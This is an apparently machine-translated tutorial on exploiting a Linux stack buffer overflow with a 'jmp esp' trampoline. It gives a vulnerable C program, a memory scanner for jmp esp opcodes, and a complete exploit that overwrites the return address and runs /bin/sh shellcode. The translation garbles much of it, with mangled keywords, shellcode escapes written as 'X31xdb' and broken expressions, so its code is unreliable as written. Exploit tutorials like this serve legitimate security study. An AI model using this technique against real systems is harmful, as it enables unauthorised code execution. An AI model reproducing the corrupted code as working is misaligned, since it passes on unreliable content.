Execute shellcode using jmp esp

Source: bkbll@cnhonker.net & evil baboons

1. preface.
In Buffer overflow in Linux, there are many shellcodes used to jump to the stack. in windows, there are many jumps using jmp esp. There is no new technology in this article, but it is just a whim, just change my methods.
2. comparison.
The frequently used shellcode method to jump to the stack has a good side. For example, you can put shellcode in ENV to avoid the length limit. the disadvantage is that this computation is troublesome. Increasing NOP is a good choice. jmp esp is also a good choice, so you don't need to know the specific location of shellcode.
3. check what is going on.
Problematic program:
[Netconf @ linux1 test] $ cat vul. c
# Include <stdio. h>
# Include <stdlib. h>
# Include <unistd. h>

Int foo (char * s1)
{
Char buffer [20];
Memset (buffer, 0, 20 );
Strcpy (buffer, s1 );
Printf ("input: % s", buffer );
Return 0;
}

Main (int argc, char ** argv)
{

If (argc <2)
{
Printf ("Usage: % s <string>", argv [0]);
Exit (0 );
}
Foo (argv [1]);
Exit (0 );
}
A very common buffer overflow.
The stack structure is as follows:
| AAAA ................ A | Other content | ebp | eip |
After overflow, it is generally like this:
| AAAAAA ............ A ....... AAAAAAAA | shellcode address |
Use the shellcode address to replace the saved eip Value
Use the stack structure of jmp esp:
| AAAAAAAAAAAAAAAAAAAAAA | jmp esp addr | shellcode
Use jmp esp addr to overwrite the eip, so that when the program executes the eip, it will execute the jmp esp command. At this time, esp is the address where we store shellcode, this accuracy is greatly improved, and no additional NOP is needed for coverage.
First, we need an address. The assembly code of the content of this address should be jmp esp. We need to write a small program to get the address we need:
[Netconf @ linux1 test] $ cat findesp. c
# Include <stdio. h>
# Include <stdlib. h>
# Include <signal. h>
Unsigned int I = 0x4211cc79;
Unsigned int a = 0;
Unsigned char * p;
Void de (int j)
{
Printf ("Got SIGSEGV :");
Printf ("% p", p + );
A ++;
Exit (0 );
}
Main ()
{
P = (unsigned char *) I;
Signal (SIGSEGV, de );
Foo ();
}
Int foo ()
{
While (unsigned int) p + a <0 xbfffffff)
{
Fflush (stdout );
If (* (p + a) = 0xff) & (* (p + a + 1) = 0xe4 ))
{
Printf ("found it !!, P addr: % p ", p + );
A + = 2;
Foo ();
}
A ++;
}
Exit (0 );
}
Run:
[Netconf @ linux1 test] $./findesp
Found it !!, P addr: 0x4211ccf7
Found it !!, P addr: 0x4211dd5b
Found it !!, P addr: 0x4211dee7
Found it !!, P addr: 0x4211e15f
Found it !!, P addr: 0x4211e59f
Found it !!, P addr: 0x42125aa3
Found it !!, P addr: 0x42125c13

Got SIGSEGV: 0x4212f000
[Netconf @ linux1 test] $
Yes, I got a lot of addresses that meet the conditions. We can just select one address without 0x00.
In this way, we can write an exploit:
[Netconf @ linux1 test] $ cat exp. c
# Include <stdio. h>
# Include <stdlib. h>
# Include <signal. h>
# Include <unistd. h>
# Include <error. h>

# Define JMPESP 0x42125aa3

Char progname [] = "./vul ";
Char shellcode [] =
"X31xdbx31xc9x31xd2x31xc0xb0xa4xcdx80"
"X89xd8xb0x17xcdx80"
"X31xc0x50xb0xb5xcdx80"
"Xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
"X89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
"X80xe8xdcxffxffxff/bin/sh ";

Main (int argc, char ** argv)
{
Char buffer [1024];
Int num = 44, I = 0;

Memset (buffer );
Memset (buffer, A, num );
Buffer [num ++] = JMPESP & 0xff;
Buffer [num ++] = (JMPESP> 8) & 0xff;
Buffer [num ++] = (JMPESP> 16) & 0xff;
Buffer [num ++] = (JMPESP> 24) & 0xff;
Memcpy (buffer + num, shellcode, sizeof (shellcode ));
Execl (progname, progname, buffer, NULL );
}
Is it a very short program?
[Netconf @ linux1 test] $./exp
........................
. When 1 then there were too many